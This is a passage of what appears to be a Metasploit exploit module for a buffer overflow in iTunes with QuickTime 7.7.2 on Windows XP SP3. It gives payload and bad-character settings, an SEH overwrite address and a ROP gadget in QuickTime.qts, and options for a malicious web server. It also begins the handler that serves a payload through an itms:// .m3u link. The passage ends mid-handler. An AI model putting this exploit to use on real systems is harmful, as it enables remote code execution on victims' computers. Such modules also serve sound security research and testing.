'Platform' => ['win'],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404
},
'Targets' =>
[
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.7.2 - Windows XP SP3 EN Professional',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'SEH' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts v7.7.2]
'ROP_NOP' => 0x66801044 # RET
}
]
],
'DefaultTarget' => 0
))
register_options(
[
# IP has to be a reachable address and not 0.0.0.0, as it is used to redirect the browser to itms://<IP>
OptString.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine (not 0.0.0.0 !)", ""]),
OptPort.new('SRVPORT', [true, "The local port to listen on", 80]),
OptString.new('URIPATH', [false, "The URI to use for this exploit", "/"]),
],
self.class
)
end
def on_request_uri(cli,request)
# re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
host = request.headers['HOST']
agent = request.headers['USER-AGENT']
# iTunes browser link
m3u_location = "itms://#{host}/#{rand_text_alphanumeric(8+rand(8))}.m3u"